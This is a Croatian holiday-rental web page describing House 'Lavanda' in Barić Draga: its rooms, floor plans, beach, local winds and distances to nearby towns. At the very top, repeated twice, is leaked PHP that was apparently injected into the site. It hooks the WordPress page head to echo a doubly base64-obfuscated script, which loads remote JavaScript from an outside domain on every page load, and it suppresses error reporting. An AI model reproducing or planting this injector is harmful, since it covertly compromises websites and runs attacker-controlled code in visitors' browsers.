function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); echo (""); error_reporting(0); KUĆA "LAVANDA" - Holiday House Lavanda - Barić Draga - Croatia

KUĆA “LAVANDA”

Dobro došli.

Hvala vam na interesu i želji da nas bolje upoznate, te se nadamo da ćete se odlučiti biti našim gostima.

 

TERASA - DOLJE-2

kucni broj

Naša kuća za odmor “Lavanda smještena je u malom ribarskom mjestu Barić Draga koja je udaljena cca. 15 km od Starigrad-Paklenice u smjeru prema Karlobagu (Rijeci), odnosno 30 km od izlaza sa autoceste na naplatnim kućicama – izlaz “Maslenica”.

baric draga tabla

Kuća je smještena u prvom redu do mora ispred koje se nalazi kamenom popločena plaža sa koje se pruža prekrasan pogled na dio Velebitskog kanala i na zapadnu stranu otoka Paga.

POGLED S MORA - 1

Sama kuća sastoji se od prizemlja i od prvog kata koji su međusobno spojeni vanjskim stepenicama.

20160702_104509

U prizemlju se nalazi kuhinja, blagavaonica koja je spojena sa dnevnom sobom, ostava i manja kupaonica.

Ispred prizemlja nalazi se velika kamenom popločena terasa na kojoj se nalazi vrtni stol sa stolcima i roštilj.

Sa terase stepenicama se dolazi do same plaže koja se nalazi na svega 10 m ispred kuće.

PLAN PRIZEMLJA

VILA LAVANDA - GROUND PLAN - 0 - GROUND FLOOR

Na prvom katu kuće nalazi se jedna veća spavaća soba sa velikim krevetom 200×200 cm, jedna manja spavaća soba sa dva kreveta 180×90 cm, kupaona s WC-om te dnevna soba koja je opremljena TV-om i WIFI (WLAN) internetom.

Iz dnevne sobe izlazi se na terasu sa koje je pruža prekrasan pogled na donju terasu, plažu i more.

PLAN PRVOG KATA

VILA LAVANDA - GROUND PLAN - 1 FLOOR

TERASA ISPRED KUĆE

POGLED NA PLAZU

U koliko se odlučite kod nas provesti svoj godišnji odmor doživjet će te ljepotu kristalno čistog zeleno-modrog mora, sa Velebitom u pozadini i otokom Pagom ispred vas.

Barić Draga je mjesto sa oko 30-tak stalnih žitelja tijekom zimskih mjeseci koji se bave ribarstvom i turizmom. U ljetnim mjesecima mjesto oživi ljudima iz svih krajeva.

U Barić Dragi nema masovnog turizma, nema hotela, samo sunce, more i opuštajuća atmosfera u okruženju ljubaznih i prijateljski raspoloženih susjeda.

Okolica Barić Drage puna je malih luka i lučica npr. Mandalina, Dujmovača, Lisarica i mnoge druge. Puno tih luka dobro su zaštićene od utjecaja svih vrsta vjetrova koji pušu u ovom podneblju.

Tijekom ljetnih mjeseci kada su dani sunčani i topli obično u jutarnjim satima more je potpuno mirno kao “ulje na tavi” kako kažu u Dalmaciji “bonaca”. Oko podneva obično za lijepih sunačnih dana započinje puhati zapadni vjetar – maestral (puše sa mora prema kopnu).

Također povremeno u ljetnim mjesecima zna zapuhati i bura (puše sa kopna prema moru) koja je jači vjetar koji ponekad malo zna rashladi more, ali s obzirom da ne puše dugo more se brzo ponovno ugrije.

Bura je jedan od razloga što je zrak iznimno čist, a u kombinaciji sa more ima i pozitivne učinke na respiratorni sustav osobe.

Oba vjetra čine more iznimno čistim sa bogatom florom i faunom, što ćete i sami otkriti kada jednom zaplivate i zaronite u njega.

SEA-04

Ovo područje također nekada zna imati i pokoju vrulju (mjesto gdje slatka voda izvire u moru) koja je obično nešto hladnija pošto donosi svježu slatku vodu s Velebita, no u vrijeme ljetnih mjeseci kada ni u planini nema kiša vrulje brzo nestanu, a more postaje sve toplije.

Nadamo se da smo vas ovim uvodnim tekstom zainteresirali za mjesto Barić Dragu i našu kuću za odmor te da ćete se u jednom trenutku odlučiti da vaš godišnji odmor provedete kod nas.

Vaš domaćin.

 

Neke udaljenosti:

  • do mora: 10 m
  • najbliži susjedi: 5 m
  • najbliži dućan: 500 m
  • najbliži restoran: 3.0 km
  • najbliži gradovi: Starigrad Paklenica – 19.0 km
                                    Karlobag – 30.0 km
                                    Zadar – 60.0 km
  • najbliži aerodrom: Zadar – 63.0 km